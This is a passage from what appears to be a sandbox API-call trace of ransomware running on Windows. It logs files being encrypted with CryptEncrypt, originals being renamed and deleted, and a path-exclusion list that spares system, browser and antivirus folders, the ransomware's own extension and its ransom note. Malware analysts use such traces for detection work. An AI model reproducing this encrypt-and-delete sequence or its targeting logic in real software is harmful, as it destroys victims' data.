lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0162.580] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0162.580] GetLastError () returned 0x0 [0162.580] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0162.580] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x32, lpOverlapped=0x0) returned 1 [0162.580] CryptEncrypt (in: hKey=0x9ad778, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x32, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x40) returned 1 [0162.580] GetLastError () returned 0x0 [0162.580] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x40, lpOverlapped=0x0) returned 1 [0162.580] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0162.580] WriteFile (in: hFile=0x588, lpBuffer=0x2974d38*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0162.581] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg")) returned 0x20 [0162.581] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.jpg", dwFileAttributes=0x20) returned 0 [0162.581] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.jpg") returned 1 [0162.581] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg")) returned 0 [0162.581] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.jpg" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.jpg" [0162.582] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.jpg" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0162.582] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXEE7B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxee7b.tmp")) returned 0xee7b [0162.582] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXEE7B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxee7b.tmp"), dwFlags=0x1) returned 0 [0162.582] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXEE7B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxee7b.tmp")) returned 1 [0162.583] CryptDestroyKey (hKey=0x9ad778) returned 1 [0162.583] wcslen (_String="OK") returned 0x2 [0162.583] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0162.583] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0162.583] CryptDestroyKey (hKey=0x9ad338) returned 1 [0162.583] CryptDestroyHash (hHash=0x9ad4b8) returned 1 [0162.583] CryptReleaseContext (hProv=0x8e3088, dwFlags=0x0) returned 1 [0162.583] FindNextFileW (in: hFindFile=0x9ad238, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0162.583] PathMatchSpecW (pszFile="Blue_Gradient.jpg", pszSpec="*NMCRYPT") returned 0 [0162.583] PathMatchSpecW (pszFile="Blue_Gradient.jpg", pszSpec="*Recovers your files.html") returned 0 [0162.583] PathMatchSpecW (pszFile="Blue_Gradient.jpg", pszSpec="*.exe") returned 0 [0162.583] PathMatchSpecW (pszFile="Blue_Gradient.jpg", pszSpec="*.dll") returned 0 [0162.583] PathMatchSpecW (pszFile="Blue_Gradient.jpg", pszSpec="*.lnk") returned 0 [0162.583] PathMatchSpecW (pszFile="Blue_Gradient.jpg", pszSpec="*.bat") returned 0 [0162.583] PathMatchSpecW (pszFile="Blue_Gradient.jpg", pszSpec="*.ini") returned 0 [0162.583] PathMatchSpecW (pszFile="Blue_Gradient.jpg", pszSpec="*.msi") returned 0 [0162.583] PathMatchSpecW (pszFile="Blue_Gradient.jpg", pszSpec="*.scf") returned 0 [0162.583] PathMatchSpecW (pszFile="Blue_Gradient.jpg", pszSpec="*pagefile.sys*") returned 0 [0162.583] PathMatchSpecW (pszFile="Blue_Gradient.jpg", pszSpec="*NTUSER.DAT*") returned 0 [0162.583] PathMatchSpecW (pszFile="Blue_Gradient.jpg", pszSpec="*AppData*") returned 0 [0162.583] PathMatchSpecW (pszFile="Blue_Gradient.jpg", pszSpec="*\\winrar\\*") returned 0 [0162.583] PathMatchSpecW (pszFile="Blue_Gradient.jpg", pszSpec="*\\Internet Explorer\\*") returned 0 [0162.583] PathMatchSpecW (pszFile="Blue_Gradient.jpg", pszSpec="*\\java\\*") returned 0 [0162.583] PathMatchSpecW (pszFile="Blue_Gradient.jpg", pszSpec="*\\TeamViewer\\*") returned 0 [0162.583] PathMatchSpecW (pszFile="Blue_Gradient.jpg", pszSpec="*\\windows\\*") returned 0 [0162.583] PathMatchSpecW (pszFile="Blue_Gradient.jpg", pszSpec="*\\ESET\\*") returned 0 [0162.583] PathMatchSpecW (pszFile="Blue_Gradient.jpg", pszSpec="*\\AVG\\*") returned 0 [0162.583] PathMatchSpecW (pszFile="Blue_Gradient.jpg", pszSpec="*\\AVIRA\\*") returned 0 [0162.583] PathMatchSpecW (pszFile="Blue_Gradient.jpg", pszSpec="*\\AVAST Software\\*") returned 0 [0162.583] PathMatchSpecW (pszFile="Blue_Gradient.jpg", pszSpec="*Atheros*") returned 0 [0162.583] PathMatchSpecW (pszFile="Blue_Gradient.jpg", pszSpec="*Realtek*") returned 0 [0162.583] PathMatchSpecW (pszFile="Blue_Gradient.jpg", pszSpec="*bootmgr*") returned 0 [0162.583] PathMatchSpecW (pszFile="Blue_Gradient.jpg", pszSpec="*boot*") returned 0 [0162.583] PathMatchSpecW (pszFile="Blue_Gradient.jpg", pszSpec="*boot*") returned 0 [0162.583] PathMatchSpecW (pszFile="Blue_Gradient.jpg", pszSpec="*CONFIG.SYS*") returned 0 [0162.583] PathMatchSpecW (pszFile="Blue_Gradient.jpg", pszSpec="*IO.SYS*") returned 0 [0162.583] PathMatchSpecW (pszFile="Blue_Gradient.jpg", pszSpec="*MSDOS.SYS*") returned 0 [0162.583] PathMatchSpecW (pszFile="Blue_Gradient.jpg", pszSpec="*NTDETECT.COM*") returned 0 [0162.583] PathMatchSpecW (pszFile="Blue_Gradient.jpg", pszSpec="*ntldr*") returned 0 [0162.583] PathMatchSpecW (pszFile="Blue_Gradient.jpg", pszSpec="*chrome*") returned 0 [0162.583] PathMatchSpecW (pszFile="Blue_Gradient.jpg", pszSpec="*opera*") returned 0 [0162.583] PathMatchSpecW (pszFile="Blue_Gradient.jpg", pszSpec="*firefox*") returned 0 [0162.584] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Blue_Gradient.jpg", pszSpec="*") returned 1 [0162.584] strlen (_Str="NMoreira") returned 0x8 [0162.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.584] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.585] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 